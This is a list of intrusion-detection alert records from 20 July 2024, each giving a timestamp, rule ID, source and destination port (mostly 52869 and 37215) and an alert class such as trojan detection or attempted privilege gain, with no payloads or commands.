                      Timestamp:07/20/24-23:06:11.271256
                      SID:2027339
                      Source Port:42868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:00.185152
                      SID:2025132
                      Source Port:54954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.470552
                      SID:2025132
                      Source Port:45862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.454459
                      SID:2027339
                      Source Port:40322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2835222
                      Source Port:54404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2835222
                      Source Port:48216
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.791787
                      SID:2831300
                      Source Port:53084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.102253
                      SID:2027339
                      Source Port:37920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.717999
                      SID:2027339
                      Source Port:45914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2835222
                      Source Port:54098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.499893
                      SID:2829579
                      Source Port:34912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.268005
                      SID:2025132
                      Source Port:53206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:10.418021
                      SID:2027339
                      Source Port:32858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:25.713951
                      SID:2027339
                      Source Port:33922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2829579
                      Source Port:55770
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.601961
                      SID:2831300
                      Source Port:40412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2835222
                      Source Port:43994
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.500189
                      SID:2027339
                      Source Port:40848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.235312
                      SID:2831300
                      Source Port:48658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.271056
                      SID:2027339
                      Source Port:52442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.162612
                      SID:2027339
                      Source Port:50784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.832778
                      SID:2027339
                      Source Port:33912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2835222
                      Source Port:55980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2829579
                      Source Port:44598
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.457748
                      SID:2831300
                      Source Port:35170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.238265
                      SID:2829579
                      Source Port:38070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.555463
                      SID:2025132
                      Source Port:48792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.032524
                      SID:2025132
                      Source Port:38386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.421313
                      SID:2829579
                      Source Port:42430
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.754581
                      SID:2025132
                      Source Port:50134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.546922
                      SID:2027339
                      Source Port:55148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.439699
                      SID:2831300
                      Source Port:34974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2835222
                      Source Port:33646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.045159
                      SID:2027339
                      Source Port:49234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.575886
                      SID:2025132
                      Source Port:54172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2835222
                      Source Port:39770
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.208037
                      SID:2027339
                      Source Port:53788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.952301
                      SID:2025132
                      Source Port:55178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.306292
                      SID:2027339
                      Source Port:53430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.558741
                      SID:2025132
                      Source Port:41890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.916755
                      SID:2025132
                      Source Port:41502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2835222
                      Source Port:47188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.732595
                      SID:2027339
                      Source Port:53432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2829579
                      Source Port:56052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.235364
                      SID:2027339
                      Source Port:47042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.445692
                      SID:2831300
                      Source Port:43708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.820676
                      SID:2025132
                      Source Port:39628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.754007
                      SID:2835222
                      Source Port:33798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.787018
                      SID:2831300
                      Source Port:36230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:06.347525
                      SID:2025132
                      Source Port:41102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.761105
                      SID:2835222
                      Source Port:41812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.065904
                      SID:2829579
                      Source Port:50988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.938370
                      SID:2831300
                      Source Port:37092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.058070
                      SID:2835222
                      Source Port:49202
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.811024
                      SID:2027339
                      Source Port:40152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.525782
                      SID:2027339
                      Source Port:43378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.162298
                      SID:2025132
                      Source Port:44030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.983376
                      SID:2831300
                      Source Port:39044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.938217
                      SID:2027339
                      Source Port:37276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.280682
                      SID:2025132
                      Source Port:36824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.673284
                      SID:2831300
                      Source Port:34506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.501695
                      SID:2027339
                      Source Port:48326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.202361
                      SID:2027339
                      Source Port:60200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.610603
                      SID:2027339
                      Source Port:48380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347577
                      SID:2027339
                      Source Port:58642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.983284
                      SID:2027339
                      Source Port:42526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.574335
                      SID:2027339
                      Source Port:51470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.827265
                      SID:2025132
                      Source Port:48852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.746218
                      SID:2831300
                      Source Port:52852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.694959
                      SID:2027339
                      Source Port:37078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.332122
                      SID:2027339
                      Source Port:51658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220683
                      SID:2829579
                      Source Port:47864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.950361
                      SID:2025132
                      Source Port:38592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.174161
                      SID:2025132
                      Source Port:59016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2829579
                      Source Port:58584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.443569
                      SID:2831300
                      Source Port:51794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.620376
                      SID:2027339
                      Source Port:34738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2829579
                      Source Port:47964
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657263
                      SID:2829579
                      Source Port:52708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.723902
                      SID:2027339
                      Source Port:38530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.179441
                      SID:2027339
                      Source Port:56516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.532322
                      SID:2025132
                      Source Port:33904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.244491
                      SID:2027339
                      Source Port:50786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.216907
                      SID:2027339
                      Source Port:41080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.256977
                      SID:2025132
                      Source Port:45200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.148721
                      SID:2025132
                      Source Port:37884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.876892
                      SID:2835222
                      Source Port:38732
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.936014
                      SID:2027339
                      Source Port:47634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2829579
                      Source Port:41124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.191114
                      SID:2831300
                      Source Port:35644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.813206
                      SID:2027339
                      Source Port:51954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.296284
                      SID:2027339
                      Source Port:56418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.993689
                      SID:2027339
                      Source Port:44586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.417957
                      SID:2831300
                      Source Port:58264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.812828
                      SID:2027339
                      Source Port:59956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.342606
                      SID:2027339
                      Source Port:58668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.552295
                      SID:2027339
                      Source Port:56312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2829579
                      Source Port:50998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.458829
                      SID:2027339
                      Source Port:35984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.853581
                      SID:2831300
                      Source Port:52256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.449442
                      SID:2831300
                      Source Port:42894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.598746
                      SID:2027339
                      Source Port:38230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.706627
                      SID:2025132
                      Source Port:57548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.816478
                      SID:2027339
                      Source Port:39368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324298
                      SID:2829579
                      Source Port:50794
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.803945
                      SID:2027339
                      Source Port:54246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.530370
                      SID:2027339
                      Source Port:38884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.577316
                      SID:2835222
                      Source Port:34142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.828884
                      SID:2835222
                      Source Port:37594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:58.705456
                      SID:2027339
                      Source Port:57830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.458829
                      SID:2831300
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:36.969912
                      SID:2831300
                      Source Port:38820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.241818
                      SID:2025132
                      Source Port:59786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.876892
                      SID:2829579
                      Source Port:53342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.378138
                      SID:2027339
                      Source Port:59198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.536920
                      SID:2027339
                      Source Port:53226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.740389
                      SID:2025132
                      Source Port:42998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.470987
                      SID:2025132
                      Source Port:39100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2835222
                      Source Port:59976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.592874
                      SID:2829579
                      Source Port:44472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365973
                      SID:2831300
                      Source Port:34578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.409925
                      SID:2025132
                      Source Port:56914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.294828
                      SID:2027339
                      Source Port:34276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.666608
                      SID:2025132
                      Source Port:40758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.919897
                      SID:2831300
                      Source Port:45358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2829579
                      Source Port:58514
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:58.705456
                      SID:2831300
                      Source Port:35888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:37.923474
                      SID:2025132
                      Source Port:33626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.032993
                      SID:2027339
                      Source Port:54458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.402808
                      SID:2025132
                      Source Port:55154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.856452
                      SID:2027339
                      Source Port:46020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.965682
                      SID:2027339
                      Source Port:60110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449834
                      SID:2831300
                      Source Port:51706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.159827
                      SID:2027339
                      Source Port:54226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.272821
                      SID:2025132
                      Source Port:46296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.694473
                      SID:2025132
                      Source Port:60960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.544570
                      SID:2027339
                      Source Port:35852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:40.117305
                      SID:2025132
                      Source Port:50408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.214918
                      SID:2025132
                      Source Port:59998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.066444
                      SID:2025132
                      Source Port:53802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.646796
                      SID:2831300
                      Source Port:32828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.583817
                      SID:2025132
                      Source Port:50666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2835222
                      Source Port:53658
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.437168
                      SID:2027339
                      Source Port:55944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.960851
                      SID:2025132
                      Source Port:35476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2835222
                      Source Port:56398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:30.760053
                      SID:2831300
                      Source Port:42528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.457721
                      SID:2027339
                      Source Port:56898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.545166
                      SID:2831300
                      Source Port:35250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.905402
                      SID:2027339
                      Source Port:46138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.446932
                      SID:2027339
                      Source Port:47044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.544972
                      SID:2027339
                      Source Port:57330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.152960
                      SID:2831300
                      Source Port:57160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.310523
                      SID:2027339
                      Source Port:48160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.284179
                      SID:2025132
                      Source Port:40090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.615827
                      SID:2027339
                      Source Port:42878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.662427
                      SID:2027339
                      Source Port:39980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.474846
                      SID:2027339
                      Source Port:50826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.684507
                      SID:2025132
                      Source Port:37610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.465127
                      SID:2027339
                      Source Port:45912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.419011
                      SID:2027339
                      Source Port:43736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.547041
                      SID:2831300
                      Source Port:46506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2835222
                      Source Port:48262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.488878
                      SID:2831300
                      Source Port:39070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.045966
                      SID:2027339
                      Source Port:34146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2829579
                      Source Port:40526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.857938
                      SID:2027339
                      Source Port:33050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.808887
                      SID:2829579
                      Source Port:60540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.139895
                      SID:2025132
                      Source Port:33104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.322260
                      SID:2831300
                      Source Port:39694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.687393
                      SID:2027339
                      Source Port:42090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.293209
                      SID:2027339
                      Source Port:53506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.014684
                      SID:2835222
                      Source Port:59416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2829579
                      Source Port:34852
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.262276
                      SID:2027339
                      Source Port:48052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.493434
                      SID:2027339
                      Source Port:45034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.017538
                      SID:2831300
                      Source Port:41264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:30.714690
                      SID:2831300
                      Source Port:34356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.070077
                      SID:2027339
                      Source Port:54802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2025132
                      Source Port:41088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
